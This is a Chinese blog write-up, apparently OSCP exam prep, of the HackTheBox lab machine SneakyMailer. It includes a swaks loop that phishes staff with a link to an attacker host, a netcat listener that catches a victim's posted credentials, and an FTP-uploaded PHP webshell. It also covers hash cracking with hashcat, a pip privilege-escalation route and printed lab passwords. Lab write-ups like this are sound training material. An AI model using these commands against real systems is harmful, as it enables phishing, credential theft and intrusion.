OSCP备考_0x31_HackThBox靶机_SneakyMailer

Ethan医生5个月前靶场180


nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.196.68 (扫描TCP)


image.png


nmap -sU --top-ports 100 10.129.196.68  (扫描UDP)

image.png

依照80端口提示需要绑定HOST

http://sneakycorp.htb

image.png


curl -i http://sneakycorp.htb/team.php > email.txt

将页面内容下载下来

cat email.txt |grep "@" | cut -d '>' -f2  | cut -d '<' -f1 > out.txt

image.png

并将email收集起来

使用SMTP

while read mail; do
    swaks --to $mail --from it@sneakymailer.htb --header "Subject: Credentials /Errors" --body "goto http://10.10.14.4/" --server 10.10.10.197;
  done < email.txt
  工具: 使用swaks(瑞士军刀SMTP工具)发送邮件
  收件人列表: 从email.txt文件中逐行读取邮箱地址
  发件人: 伪装成it@sneakymailer.htb
  主题: "Credentials /Errors" - 利用凭证或错误提示引起关注
  正文内容: 包含一个指向攻击者控制服务器(10.10.14.4)的链接
  SMTP服务器: 使用目标组织的邮件服务器(10.10.10.197)发送

nc -lvnp 80

image.png

firstName=Paul&lastName=Byrd&email=paulbyrd%40sneakymailer.htb&password=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt&rpassword=%5E%28%23J%40SkFv2%5B%25KhIxKk%28Ju%60hqcHl%3C%3AHt

内容解码后

1
2
3
4
firstName=Paul&lastName=Byrd&email=paulbyrd@sneakymailer.htb&password=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht&rpassword=^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht
UserName : paulbyrd
email : paulbyrd@sneakymailer.htb
password : ^(#J@SkFv2[%KhIxKk(Ju`hqcHl<:Ht

使用 evolution

连接邮箱

image.png

Username: developer

Original-Password: m^AsY7vTKVT+dV1{WOU%@NaHkUAId3]C



gobuster vhost -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -u sneakycorp.htb子域名爆破

找到一个dev的域名


http://dev.sneakycorp.htb/

image.png




FTP get webshell

上面得到的developer账号密码可以用于FTP,进去是一个dev目录,应该就是前面dev子域名的代码,我们可以直接传webshell:

image.png

上传后门到FTP挡案下

put p_ec.php,访问后门直接拿下shell

image.png


image.png

cd /var/www

pypi底下还有个子域名

image.png

pypi.sneakycorp.htb

在/var/www发现pypi.sneakycorp.htb,把这个也加到hosts访问, 注意直接访问是重定向到主站,需要8080端口:



.htpasswd

pypi目录有个.htpasswd文件,hashcat解出来pypi密码:

cat .htpasswd
pypi:$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/

hashcat -m 1600 hash.txt /usr/share/wordlists/rockyou.txt
$apr1$RV5c5YVs$U9.OTqF5n8K4mxWpSSR/p/:soufianeelhaoui

pypi: soufianeelhaoui

PyPI

现在我们有pypi的密码,就可以上传恶意的package执行代码,参考:

sudo -l 

可以无需密码,以root权限运行/usr/bin/pip3,那基本就是通过pip3安装恶意模块

标签: OSCP

相关文章

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

OSCP备考_0x16_HackThBox靶机_Linux_jarvis

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.229.137 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

OSCP备考_0x25_HackThBox靶机_Linux_OpenAdmin

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.228.199 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x38_HackThBox靶机_Windows_Devel

OSCP备考_0x38_HackThBox靶机_Windows_Devel

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.254.198 (扫描TCP)使用ftp进行连接ftp 10.129.254.198 2...

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

OSCP备考_0x18_HackThBox靶机_Linux_Popcorn

nmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.70.193 (扫描TCP)nmap -sU --top-ports 100 ...

OSCP备考_0x28_HackThBox靶机_Linux_blunder

OSCP备考_0x28_HackThBox靶机_Linux_blunder

blundernmap -sCV -p- --min-rate 10000 -T4 -sS 10.129.193.124 (扫描TCP)nmap -sU --top-ports 1...

HTB.OSCP一招网络问题解决

HTB.OSCP一招网络问题解决

刚报考的第二天发现LAB一直断,之后购买VPS 阿里云-新加坡服务器记得需要注意防火墙,使用的协议 如果是TCP就使用TCP UDP就使用UDP下面解决HTB或OSCP的 openvpn都是可以的非常...

发表评论    

◎欢迎参与讨论,请在这里发表您的看法、交流您的观点。